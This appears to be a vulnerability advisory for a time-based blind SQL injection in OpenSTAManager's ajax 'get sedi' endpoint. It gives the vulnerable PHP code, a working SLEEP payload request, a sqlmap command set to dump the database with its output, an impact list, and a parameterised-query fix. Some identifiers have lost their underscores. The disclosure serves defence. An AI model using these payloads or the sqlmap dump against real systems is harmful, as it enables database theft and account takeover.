Summary

Proof of Concept

Vulnerable Code

case 'get sedi':
  $idanagrafica = get('idanagrafica');
  $q = "SELECT id, CONCAT WS( ' - ', nomesede, citta ) AS descrizione 
     FROM an sedi 
     WHERE idanagrafica='".$idanagrafica."' ...";
  $rs = $dbo->fetchArray($q);

Data Flow

1. Source: $ GET['idanagrafica'] → get('idanagrafica')
2. Vulnerable: User input concatenated directly into SQL query with single quotes
3. Sink: $dbo->fetchArray($q) executes the malicious query

Exploit

GET /ajax complete.php?op=get sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>

sqlmap -u "http://localhost:8081/ajax complete.php?op=get sedi&idanagrafica=1*" 
 --cookie="PHPSESSID=<session>" 
 --dbms=MySQL 
 --technique=T 
 --level=3 
 --dump

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12

Impact

• Data Exfiltration: Complete database extraction including user credentials, customer data, financial records
• Privilege Escalation: Modification of zz users table to gain admin access
• Data Integrity: Unauthorized modification or deletion of records
• Potential RCE: Via SELECT ... INTO OUTFILE if file permissions allow

Affected Versions

• OpenSTAManager: Verified in latest version (as of December 2025)
• All versions using this endpoint are likely affected

Remediation

$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Credit